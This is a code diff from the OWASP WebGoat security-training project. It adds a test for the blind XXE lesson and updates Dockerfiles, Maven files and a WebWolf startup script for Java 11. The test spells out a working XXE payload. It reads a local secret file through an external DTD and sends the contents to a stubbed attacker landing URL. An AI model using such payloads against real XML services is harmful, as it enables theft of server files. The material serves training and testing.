webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java

@@ -89,7 +89,34 @@ public class BlindSendFileAssignmentTest extends LessonTest {
                 "%remote;" +
                 "]>" +
                 "<comment><text>test&send;</text></comment>";
+        performXXE(xml);
+    }
 
+    @Test
+    public void solveOnlyParamReferenceEntityInExternalDTD() throws Exception {
+        File targetFile = new File(webGoatHomeDirectory, "/XXE/secret.txt");
+        //Host DTD on WebWolf site
+        String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
+                "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:9090/landing?text=%file;'>\">\n";
+        webwolfServer.stubFor(get(WireMock.urlMatching("/files/test.dtd"))
+                .willReturn(aResponse()
+                        .withStatus(200)
+                        .withBody(dtd)));
+        webwolfServer.stubFor(get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200)));
+
+        //Make the request from WebGoat
+        String xml = "<?xml version=\"1.0\"?>" +
+                "<!DOCTYPE comment [" +
+                "<!ENTITY % file SYSTEM \"" + targetFile.toURI().toString() + "\">\n" +
+                "<!ENTITY % remote SYSTEM \"http://localhost:9090/files/test.dtd\">" +
+                "%remote;" +
+                "%all;" +
+                "]>" +
+                "<comment><text>test&send;</text></comment>";
+        performXXE(xml);
+    }
+
+    private void performXXE(String xml) throws Exception {
         //Call with XXE injection
         mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind")
                 .content(xml))

webgoat-server/Dockerfile

@@ -1,6 +1,6 @@
-FROM openjdk:8-jre-slim
+FROM openjdk:11.0.1-jre-slim-stretch
 
-ARG webgoat_version=v8.0.0.SNAPSHOT
+ARG webgoat_version=v8.0.0-SNAPSHOT
 
 RUN \
   apt-get update && apt-get install && \
@@ -10,5 +10,7 @@ USER webgoat
 RUN cd /home/webgoat/; mkdir -p .webgoat-${webgoat_version}
 COPY target/webgoat-server-${webgoat_version}.jar /home/webgoat/webgoat.jar
 
-ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webgoat/webgoat.jar", "--server.address=0.0.0.0"]
 EXPOSE 8080
+
+ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webgoat/webgoat.jar"]
+CMD ["--server.port=8080", "--server.address=0.0.0.0"]

webgoat-server/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat</groupId>
         <artifactId>webgoat-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 
     <properties>
@@ -203,11 +203,13 @@
         <!--<version>${project.version}</version>-->
         <!--</dependency>-->
         <!-- /lessons -->
-        <dependency>
+
-            <groupId>org.springframework.boot</groupId>
+        <!-- devtools no longer working with Java 11 and Spring Boot version 1.* enable again once we move to 2.0-->
-            <artifactId>spring-boot-devtools</artifactId>
+        <!--<dependency>-->
-            <optional>true</optional>
+            <!--<groupId>org.springframework.boot</groupId>-->
-        </dependency>
+            <!--<artifactId>spring-boot-devtools</artifactId>-->
+            <!--<optional>true</optional>-->
+        <!--</dependency>-->
         <dependency>
             <groupId>org.postgresql</groupId>
             <artifactId>postgresql</artifactId>

webgoat-server/src/main/java/org/owasp/webgoat/HSQLDBDatabaseConfig.java

@@ -1,5 +1,6 @@
 package org.owasp.webgoat;
 
+import lombok.extern.slf4j.Slf4j;
 import org.hsqldb.server.Server;
 import org.springframework.beans.factory.annotation.Value;
 import org.springframework.boot.autoconfigure.condition.ConditionalOnProperty;
@@ -17,6 +18,7 @@ import javax.sql.DataSource;
  * JVM. This can only be done if you start a standalone HSQLDB. We need both WebWolf and WebGoat to use the same database
  */
 @Configuration
+@Slf4j
 @ConditionalOnProperty(prefix = "webgoat.start", name = "hsqldb", havingValue = "true")
 public class HSQLDBDatabaseConfig {
 
@@ -27,7 +29,7 @@ public class HSQLDBDatabaseConfig {
     public Server hsqlStandalone(@Value("${webgoat.server.directory}") String directory,
                                  @Value("${hsqldb.silent:true}") boolean silent,
                                  @Value("${hsqldb.trace:false}") boolean trace) {
-
+        log.info("Starting internal database on port {} ...", hsqldbPort);
         Server server = new Server();
         server.setDatabaseName(0, "webgoat");
         server.setDatabasePath(0, directory + "/data/webgoat");

webgoat-server/src/main/java/org/owasp/webgoat/StartWebGoat.java

@@ -24,17 +24,22 @@
  */
 package org.owasp.webgoat;
 
+import lombok.extern.slf4j.Slf4j;
 import org.springframework.boot.SpringApplication;
 import org.springframework.boot.autoconfigure.SpringBootApplication;
 
 /**
+ * Main entry point, this project is here to get all the lesson jars included to the final jar file
+ *
  * @author nbaars
  * @date 2/21/17
  */
 @SpringBootApplication
+@Slf4j
 public class StartWebGoat {
 
     public static void main(String[] args) {
+        log.info("Starting WebGoat with args: {}", args);
         SpringApplication.run(WebGoat.class, args);
     }
 }

webwolf/Dockerfile

@@ -1,6 +1,6 @@
-FROM openjdk:8-jre-slim
+FROM openjdk:11.0.1-jre-slim-stretch
 
-ARG webwolf_version=v8.0.0.SNAPSHOT
+ARG webwolf_version=v8.0.0-SNAPSHOT
 
 RUN \
   apt-get update && apt-get install && \
@@ -8,7 +8,9 @@ RUN \
 
 USER webwolf
 COPY target/webwolf-${webwolf_version}.jar /home/webwolf/webwolf.jar
-
+COPY start-webwolf.sh /home/webwolf
-ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webwolf/webwolf.jar", "--server.port=9090", "--server.address=0.0.0.0"]
 
 EXPOSE 9090
+
+ENTRYPOINT ["/home/webwolf/start-webwolf.sh"]
+CMD ["--server.port=9090", "--server.address=0.0.0.0"]

webwolf/pom.xml

@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat</groupId>
         <artifactId>webgoat-parent</artifactId>
-        <version>v8.0.0.M20</version>
+        <version>v8.0.0.M22</version>
     </parent>
 
     <dependencies>
@@ -26,7 +26,7 @@
         <dependency>
             <groupId>commons-io</groupId>
             <artifactId>commons-io</artifactId>
-            <version>LATEST</version>
+            <version>${commons-io.version}</version>
         </dependency>
         <dependency>
             <groupId>org.springframework.boot</groupId>
@@ -57,11 +57,13 @@
             <groupId>org.springframework.boot</groupId>
             <artifactId>spring-boot-starter-data-jpa</artifactId>
         </dependency>
-        <dependency>
+
-            <groupId>org.springframework.boot</groupId>
+        <!-- devtools no longer working with Java 11 and Spring Boot version 1.* enable again once we move to 2.0-->
-            <artifactId>spring-boot-devtools</artifactId>
+        <!--<dependency>-->
-            <optional>true</optional>
+        <!--<groupId>org.springframework.boot</groupId>-->
-        </dependency>
+        <!--<artifactId>spring-boot-devtools</artifactId>-->
+        <!--<optional>true</optional>-->
+        <!--</dependency>-->
 
         <dependency>
             <groupId>org.webjars</groupId>
@@ -103,9 +105,9 @@
                 <artifactId>maven-compiler-plugin</artifactId>
                 <version>${maven-compiler-plugin.version}</version>
                 <configuration>
-                    <source>1.8</source>
+                    <source>11</source>
-                    <target>1.8</target>
+                    <target>11</target>
-                    <encoding>ISO-8859-1</encoding>
+                    <encoding>UTF-8</encoding>
                 </configuration>
             </plugin>
             <plugin>

webwolf/start-webwolf.sh

@@ -0,0 +1,7 @@
+#!/bin/bash
+
+# Script to start WebWolf, it needs a valid database connection from WebGoat so we wait 8 seconds before starting
+# WebWolf application
+
+echo " Waiting for database to be available..."
+sleep 8 && java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar $@